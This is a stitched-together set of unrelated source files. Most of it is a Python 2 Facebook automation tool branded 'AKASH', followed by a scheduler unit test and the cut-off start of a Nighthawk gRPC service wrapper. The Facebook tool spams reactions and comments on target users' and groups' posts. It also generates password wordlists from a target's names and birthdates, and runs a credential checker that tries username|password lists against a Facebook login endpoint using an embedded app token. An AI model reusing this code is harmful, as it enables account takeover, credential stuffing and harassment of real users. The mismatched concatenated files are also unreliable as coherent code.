os.system('reset')
print logo
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[AKASH] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[AKASH] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;97m[ \033[1;92mMyGroup\033[1;97m ] "+str(id)+" => "+str(nama)
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except (KeyboardInterrupt,EOFError):
print("\033[1;91m[!] Stopped")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;91m[!] Group not found')
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except requests.exceptions.ConnectionError:
print"\033[1;91m[✖] No Connection"
keluar()
except IOError:
print "\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### PROFIL GUARD #####
def guard():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Activate"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Not activate"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
g = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if g == "1":
aktif = "true"
gaz(toket, aktif)
elif g == "2":
non = "false"
gaz(toket, non)
elif g =="0":
lain()
elif g =="":
keluar()
else:
keluar()
def get_userid(toket):
url = "https://graph.facebook.com/me?access_token=%s"%toket
res = requests.get(url)
uid = json.loads(res.text)
return uid["id"]
def gaz(toket, enable = True):
id = get_userid(toket)
data = 'variables={"0":{"is_shielded": %s,"session_id":"9b78191c-84fd-4ab6-b0aa-19b39f04a6bc","actor_id":"%s","client_mutation_id":"b0316dd6-3fd6-4beb-aed4-bb29c5dc64b0"}}&method=post&doc_id=1477043292367183&query_name=IsShieldedSetMutation&strip_defaults=true&strip_nulls=true&locale=en_US&client_country_code=US&fb_api_req_friendly_name=IsShieldedSetMutation&fb_api_caller_class=IsShieldedSetMutation' % (enable, str(id))
headers = {"Content-Type" : "application/x-www-form-urlencoded", "Authorization" : "OAuth %s" % toket}
url = "https://graph.facebook.com/graphql"
res = requests.post(url, data = data, headers = headers)
print(res.text)
if '"is_shielded":true' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mActivate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
elif '"is_shielded":false' in res.text:
os.system('reset')
print logo
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;91mNot activate"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
print "\033[1;91m[!] Error"
keluar()
if __name__=='__main__':
masuk()
|
test_sched.py
|
import queue
import sched
import time
import unittest
try:
import threading
except ImportError:
threading = None
TIMEOUT = 10
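# Timer is a fake, thread-safe clock used by the concurrency tests below:
# sleep() blocks until advance() has pushed the time limit far enough, which
# makes scheduler.run() deterministic without any real waiting.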
class Timer:
def __init__(self):
self._cond = threading.Condition()
self._time = 0
self._stop = 0
def time(self):
with self._cond:
return self._time
# increase the time but not beyond the established limit
def sleep(self, t):
assert t >= 0
with self._cond:
t += self._time
while self._stop < t:
self._time = self._stop
self._cond.wait()
self._time = t
# advance time limit for user code
def advance(self, t):
assert t >= 0
with self._cond:
self._stop += t
self._cond.notify_all()
class TestCase(unittest.TestCase):
def test_enter(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.5, 0.4, 0.3, 0.2, 0.1]:
z = scheduler.enter(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.1, 0.2, 0.3, 0.4, 0.5])
def test_enterabs(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
scheduler.run()
self.assertEqual(l, [0.01, 0.02, 0.03, 0.04, 0.05])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_enter_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
scheduler.enter(1, 1, fun, (1,))
scheduler.enter(3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
for x in [4, 5, 2]:
z = scheduler.enter(x - 1, 1, fun, (x,))
timer.advance(2)
self.assertEqual(q.get(timeout=TIMEOUT), 2)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 5)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 5)
def test_priority(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for priority in [1, 2, 3, 4, 5]:
z = scheduler.enterabs(0.01, priority, fun, (priority,))
scheduler.run()
self.assertEqual(l, [1, 2, 3, 4, 5])
def test_cancel(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
event1 = scheduler.enterabs(now + 0.01, 1, fun, (0.01,))
event2 = scheduler.enterabs(now + 0.02, 1, fun, (0.02,))
event3 = scheduler.enterabs(now + 0.03, 1, fun, (0.03,))
event4 = scheduler.enterabs(now + 0.04, 1, fun, (0.04,))
event5 = scheduler.enterabs(now + 0.05, 1, fun, (0.05,))
scheduler.cancel(event1)
scheduler.cancel(event5)
scheduler.run()
self.assertEqual(l, [0.02, 0.03, 0.04])
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_cancel_concurrent(self):
q = queue.Queue()
fun = q.put
timer = Timer()
scheduler = sched.scheduler(timer.time, timer.sleep)
now = timer.time()
event1 = scheduler.enterabs(now + 1, 1, fun, (1,))
event2 = scheduler.enterabs(now + 2, 1, fun, (2,))
event4 = scheduler.enterabs(now + 4, 1, fun, (4,))
event5 = scheduler.enterabs(now + 5, 1, fun, (5,))
event3 = scheduler.enterabs(now + 3, 1, fun, (3,))
t = threading.Thread(target=scheduler.run)
t.start()
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 1)
self.assertTrue(q.empty())
scheduler.cancel(event2)
scheduler.cancel(event5)
timer.advance(1)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 3)
self.assertTrue(q.empty())
timer.advance(1)
self.assertEqual(q.get(timeout=TIMEOUT), 4)
self.assertTrue(q.empty())
timer.advance(1000)
t.join(timeout=TIMEOUT)
self.assertFalse(t.is_alive())
self.assertTrue(q.empty())
self.assertEqual(timer.time(), 4)
def test_empty(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
self.assertTrue(scheduler.empty())
for x in [0.05, 0.04, 0.03, 0.02, 0.01]:
z = scheduler.enterabs(x, 1, fun, (x,))
self.assertFalse(scheduler.empty())
scheduler.run()
self.assertTrue(scheduler.empty())
def test_queue(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
now = time.time()
e5 = scheduler.enterabs(now + 0.05, 1, fun)
e1 = scheduler.enterabs(now + 0.01, 1, fun)
e2 = scheduler.enterabs(now + 0.02, 1, fun)
e4 = scheduler.enterabs(now + 0.04, 1, fun)
e3 = scheduler.enterabs(now + 0.03, 1, fun)
# the queue property is supposed to return an ordered list of
# upcoming events
self.assertEqual(scheduler.queue, [e1, e2, e3, e4, e5])
def test_args_kwargs(self):
flag = []
def fun(*a, **b):
flag.append(None)
self.assertEqual(a, (1,2,3))
self.assertEqual(b, {"foo":1})
scheduler = sched.scheduler(time.time, time.sleep)
z = scheduler.enterabs(0.01, 1, fun, argument=(1,2,3), kwargs={"foo":1})
scheduler.run()
self.assertEqual(flag, [None])
def test_run_non_blocking(self):
l = []
fun = lambda x: l.append(x)
scheduler = sched.scheduler(time.time, time.sleep)
for x in [10, 9, 8, 7, 6]:
scheduler.enter(x, 1, fun, (x,))
scheduler.run(blocking=False)
self.assertEqual(l, [])
if __name__ == "__main__":
unittest.main()
|
nighthawk_grpc_service.py
|
import logging
import socket
import subprocess
import tempfile
import threading
import time
from common import IpVersion
# TODO(oschaaf): unify some of this code with the test server wrapper.
class NighthawkGrpcService(object):
"""
Class for running the Nighthawk gRPC service in a separate process.
Usage:
grpc_service = NighthawkGrpcService("/path/to/nighthawk_service", "127.0.0.1", IpVersion.IPV4)
if grpc_service.start():
... you can talk to the Nighthawk gRPC service at 127.0.0.1:grpc_service.server_port ...
Attributes:
